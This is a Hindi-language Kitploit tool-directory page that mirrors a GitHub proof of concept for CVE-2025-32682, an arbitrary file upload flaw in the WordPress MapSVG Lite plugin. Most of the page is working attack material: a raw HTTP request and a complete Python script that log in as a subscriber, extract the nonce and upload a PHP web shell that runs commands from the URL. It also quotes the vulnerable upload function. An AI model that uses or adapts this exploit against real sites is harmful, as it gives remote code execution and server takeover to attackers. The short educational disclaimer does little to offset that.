Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-32682 — WordPress MapSVG Lite Plugin <= 8.5.34 Arbitrary File Upload कमजोरी से ग्रस्त है | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2025-32682
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubnxploited/cve-2025-32682

CVE-2025-32682

WordPress MapSVG Lite Plugin <= 8.5.34 Arbitrary File Upload कमजोरी से ग्रस्त है

रिपॉजिटरी देखें
151 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🐚 CVE-2025-32682 - मैपएसवीजी लाइट में मनमाना फ़ाइल अपलोड <= 8.5.34

📌 प्लगइन विवरण

  • नाम: MapSVG Lite
  • प्रभावित संस्करण: <= 8.5.34
  • कमजोरी प्रकार: मनमाना फ़ाइल अपलोड
  • CVE आईडी: CVE-2025-32682
  • प्रकाशित तिथि: 15 अप्रैल, 2025
  • CVSS स्कोर: 9.9 (गंभीर)

💥 कमजोरी सारांश

WordPress के लिए MapSVG Lite प्लगइन अपने REST API एंडपॉइंट के माध्यम से SVG फ़ाइलों को अपलोड करते समय फ़ाइल प्रकारों को मान्य नहीं करता है:

/wp-json/mapsvg/v1/svgfile

यह एक प्रमाणित हमलावर (सब्सक्राइबर+) को SVG के रूप में छिपी हुई मनमानी PHP फ़ाइलें अपलोड करने की अनुमति देता है, जिसके परिणामस्वरूप दूरस्थ कोड निष्पादन (RCE) होता है।


📎 प्रमाण की अवधारणा (POC) - कच्चा HTTP अनुरोध

POST /wp-json/mapsvg/v1/svgfile HTTP/1.1

Host: 192.168.100.74:888

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Referer: http://target.com/wp-admin/admin.php?page=mapsvg-config

X-WP-Nonce: 4febb3ff50

X-Requested-With: XMLHttpRequest

Content-Type: multipart/form-data; boundary=---------------------------155355665422604566641836454807

Content-Length: 298

Origin: http://192.168.100.74:888

Connection: keep-alive

Cookie:


-----------------------------155355665422604566641836454807

Content-Disposition: form-data; name="file"; filename="nxploit.php"

Content-Type: text/xml



<!--?php  
if(isset($_GET['cmd'])) {  
    system($_GET['cmd']);  
}  
?-->  

-----------------------------155355665422604566641836454807--


🔍 कमजोर कोड स्निपेट

mapsvg-lite-interactive-vector-maps.php फ़ाइल से निम्नलिखित कमजोर कोड स्निपेट समस्या को उजागर करता है:

public function uploadSVG() {
    $file = $_FILES['file'];
    $upload = wp_upload_bits($file['name'], null, file_get_contents($file['tmp_name']));
    return new \WP_REST_Response(["file" => $upload], 200);
}
  • ❌ कोई फ़ाइल प्रकार जांच नहीं
  • ❌ कोई एक्सटेंशन सत्यापन नहीं
  • ❌ फ़ाइल सामग्री का कोई सैनिटाइज़ेशन नहीं

यह फ़ंक्शन सीधे REST एंडपॉइंट /wp-json/mapsvg/v1/svgfile से मैप किया गया है।


🧠 शोषण आवश्यकताएँ

  • ✅ प्रमाणीकरण की आवश्यकता है (सब्सक्राइबर+)
  • 🛑 कोई फ़ाइल प्रकार या सामग्री सत्यापन नहीं

🐍 POC 2 - पायथन शोषण स्क्रिप्ट

# By: Nxploited | Khaled Alenazi
import requests
import argparse
import re

requests.packages.urllib3.disable_warnings()
session = requests.Session()
session.verify = False
user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"

parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", required=True)
parser.add_argument("-un", "--username", required=True)
parser.add_argument("-p", "--password", required=True)
args = parser.parse_args()

login_url = f"{args.url}/wp-login.php"
resp = session.post(login_url, data={
    'log': args.username,
    'pwd': args.password,
    'rememberme': 'forever',
    'wp-submit': 'Log In'
}, headers={"User-Agent": user_agent})

if 'wordpress_logged_in' not in str(session.cookies):
    print("[-] Login failed")
    exit()
print("[+] Logged in successfully.")

nonce_page = session.get(f"{args.url}/wp-admin/admin.php?page=mapsvg-config")
match = re.search(r'"nonce":"([a-f0-9]+)"', nonce_page.text)
if not match:
    print("[-] Failed to extract nonce")
    exit()
nonce = match.group(1)
print(f"[+] Found nonce: {nonce}")

upload_url = f"{args.url}/wp-json/mapsvg/v1/svgfile"
print(f"[+] Uploading file to: {upload_url}")

payload = {'file': ('nxploit.php', '<?php if(isset($_GET[\'cmd\'])){ system($_GET[\'cmd\']); } ?>', 'application/x-php')}
headers = {
    'X-WP-Nonce': nonce,
    'Referer': f"{args.url}/wp-admin/admin.php?page=mapsvg-config",
    'X-Requested-With': 'XMLHttpRequest',
    'User-Agent': user_agent
}

res = session.post(upload_url, files=payload, headers=headers)

try:
    json_res = res.json()
    print("[+] Server response (formatted):")
    print("File Name    :", json_res['file']['name'])
    print("URL          :", json_res['file']['relativeUrl'])
    print("Path Short   :", json_res['file']['pathShort'])
    print("Server Path  :", json_res['file']['serverPath'])
    print("\nExploited By : Nxploited | Khaled Alenazi")
except:
    print("[-] Upload failed or invalid response.")

☠️ प्रभाव

इस कमजोरी का शोषण एक हमलावर को /wp-content/uploads/mapsvg/ निर्देशिका में एक .php वेब शेल अपलोड करने और सर्वर पर मनमाने आदेश निष्पादित करने की अनुमति देता है।


👤 द्वारा:

Nxploited | Khaled Alenazi


⚠️ अस्वीकरण

यह परियोजना केवल शैक्षिक उद्देश्यों के लिए है। अनुमति के बिना सिस्टम तक अनधिकृत पहुंच अवैध है।

टूल डाउनलोड करें